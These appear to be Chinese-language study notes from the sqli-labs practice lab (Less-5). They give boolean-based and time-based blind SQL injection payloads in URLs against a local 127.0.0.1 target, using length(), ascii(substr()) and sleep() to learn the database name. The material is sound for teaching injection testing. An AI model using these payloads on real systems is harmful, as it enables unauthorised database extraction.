SQL语句
SQL语句 显示状态 说明状态
((select length(database()))> 5) 正常 true
((select length(database()))> 10) 无显示 false
((select ascii(substr(database(),1,1)))> 75 正常 true
((select ascii(substr(database(),1,1)))> 119 无显示 false
基于布尔的盲注
例子 数据库的长度:
http://127.0.0.1/sqli/Less-5/?id=1’ and length(database()) = 8 --+
http://127.0.0.1/sqli/Less-5/?id=1’ and (SELECT ASCII(SUBSTR(DATABASE(),1,1))=115) --+
基于时间的盲注
判断是否存在注入点
http://127.0.0.1/sqli/Less-5/?id=1’ and if (1=0,1,sleep(3)) --+
判断书记库的长度
http://127.0.0.1/sqli/Less-5/?id=1’ and if (length(database())=8,sleep(3),1) --+
数据库的名字
http://127.0.0.1/sqli/Less-5/?id=1’ and if(ascii(substr(database(),1,1))=115,1,sleep(3))